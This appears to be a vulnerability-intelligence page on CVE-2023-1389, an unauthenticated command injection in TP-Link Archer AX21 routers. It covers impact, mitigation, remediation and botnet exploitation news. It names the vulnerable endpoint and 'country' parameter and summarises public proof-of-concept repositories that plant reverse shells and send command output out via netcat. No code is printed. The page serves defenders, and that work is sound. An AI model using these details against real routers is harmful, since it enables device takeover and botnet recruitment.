HighCISA KEVExploited in the wildPublic exploit

Unauthenticated Command Injection in TP-Link Archer AX21 /locale Endpoint

IdentifiersCVE-2023-1389CWE-78Also known aszdi_23_451

CVE-2023-1389 is an unauthenticated command injection vulnerability affecting TP-Link Archer AX21 (AX1800) routers running firmware before 1.1.4 Build 20230219. The flaw is in the web management interface’s locale API at /cgi-bin/luci;stok=/locale, specifically the country form write operation. The country parameter is not properly sanitized before being incorporated into a shell command and executed via popen(); supporting reporting also identifies the vulnerable code path as involving merge_country_config / merge_config_by_country and the set_country handler. Because attacker-controlled input reaches a system command without proper neutralization, a remote attacker can send a crafted POST request and inject arbitrary shell commands. Successful exploitation results in command execution in the root context on the router.

For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

Start free trial

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows unauthenticated arbitrary command execution as root on the affected router. This can lead to full device compromise, installation of malware or botnet payloads, persistence attempts, configuration tampering, traffic interception or manipulation, use of the router as a foothold into the local network, and use of the device for follow-on activity such as DDoS participation. Multiple reports in the provided content note active in-the-wild exploitation by Mirai-derived and other botnets.

Mitigation

If you can’t patch tonight, do this now.

If immediate patching is not possible, restrict exposure of the router’s web management interface to trusted networks only, disable remote/web administration where not required, and prevent WAN access to administrative endpoints. Change default or weak administrator credentials to strong unique passwords. Monitor for unexpected POST requests to /cgi-bin/luci;stok=/locale, suspicious process execution, and indicators of botnet infection. Network segmentation and ACLs limiting access to the management plane can reduce exploitability until firmware is updated.

Remediation

Patch, then assume compromise.

Upgrade affected TP-Link Archer AX21 devices to fixed firmware. The provided content states vulnerable versions are firmware versions before 1.1.4 Build 20230219 and that TP-Link issued firmware updates in March 2023 to correct the issue. Apply the latest vendor firmware available for the specific hardware revision and verify the device is no longer running a vulnerable build.

PUBLIC EXPLOITS

Exploits

2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).

VALID 2 / 3 TOTALView more in app

CVE-2023-1389MaturityPoCVerified exploit

This repository is a Go-based proof-of-concept exploit for CVE-2023-1389, targeting TP-Link Archer AX21 routers vulnerable to unauthenticated command injection. The main file, main.go, reads a list of target IP addresses from 'list.txt' and attempts to exploit each by sending a crafted HTTPS request to the /cgi-bin/luci/ endpoint, injecting a reverse shell payload. The payload causes the target device to connect back to the attacker's netcat listener, granting a remote shell. The exploit supports concurrent execution using goroutines and a concurrency manager. The repository includes a README with usage instructions, a Go module definition, and dependencies for command-line flag parsing and concurrency control. No detection or scanning functionality is present; the tool is strictly for exploitation. The main attack vector is network-based, exploiting a web interface on the target devices.

werwolfzDisclosed Dec 25, 2023gonetwork

CVE-2023-1389MaturityPoCVerified exploit

This repository contains two Python proof-of-concept exploits for CVE-2023-1389, an unauthenticated command injection vulnerability in the TP-Link Archer AX21 (AX1800) router's web management interface. The vulnerability exists in the 'country' parameter of the 'write' callback at the '/cgi-bin/luci/;stok=/locale' endpoint, allowing arbitrary command execution as root without authentication. - 'archer-file-transfer.py' allows the attacker to execute arbitrary commands on the router and exfiltrate their output by writing to '/tmp/out' and transferring it via netcat to the attacker's machine. - 'archer-rev-shell.py' provides a simpler method to obtain a reverse shell on the attacker's system using netcat. Both scripts require the attacker to specify the router's IP, their own IP, and a listening port. The exploit works by sending crafted GET requests to the vulnerable endpoint, leveraging command injection in the 'country' parameter. The README provides usage instructions and mitigation advice. The repository is structured with a README and two Python scripts, both of which are functional proof-of-concept exploits for the described vulnerability.

Voyag3r-SecurityDisclosed Jul 28, 2023pythonnetwork

EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType

TP-LinkArcher Ax21 Firmwareoperating_system

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

ACTIVITY FEED

Recent activity

47 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

47 SOURCESView more in app

krebs on securityNews

Apr 30, 2026

Anti-DDoS Firm Heaped Attacks on Brazilian ISPs - Krebs on Security

An unauthenticated command injection vulnerability affecting TP-Link devices, specifically cited as being used to compromise routers for inclusion in a DDoS botnet.

scworldNews

Apr 23, 2026

Discontinued D-Link routers subjected to Mirai botnet targeting | brief | SC Media

A vulnerability affecting TP-Link AX21 routers that the Mirai botnet was observed exploiting.

security affairsNews

Apr 22, 2026

Mirai Botnet exploits CVE-2025-29635 to target legacy D-Link routers

A vulnerability in TP-Link AX21 devices that the actor is also exploiting as part of the Mirai campaign.

help net securityNews

Apr 22, 2026

New Mirai variants target routers and DVRs in parallel campaigns - Help Net Security

A vulnerability in TP-Link Archer AX21 devices that the same actor behind tuxnokill was observed probing.

+31 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.

Start free trial

Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence1

Every observed campaign linking this CVE to a named adversary.

Associated malware22

Malware families riding this exploit, with evidence and IOCs.

Detection signatures2

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity11

Community discussion across Reddit, Mastodon, and other social sources.

EXTERNAL REFERENCES

MITRE CVE

cve.org · CVE-2023-1389

NVD

nvd.nist.gov/vuln/detail/CVE-2023-1389

MITRE CWE · CWE-78

cwe.mitre.org

Third Party Advisory

packetstormsecurity.com/files/174131/TP-Link-Archer-AX21-Command-Injection.html

Third Party Advisory

tenable.com/security/research/tra-2023-11

US Government Resource

cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-1389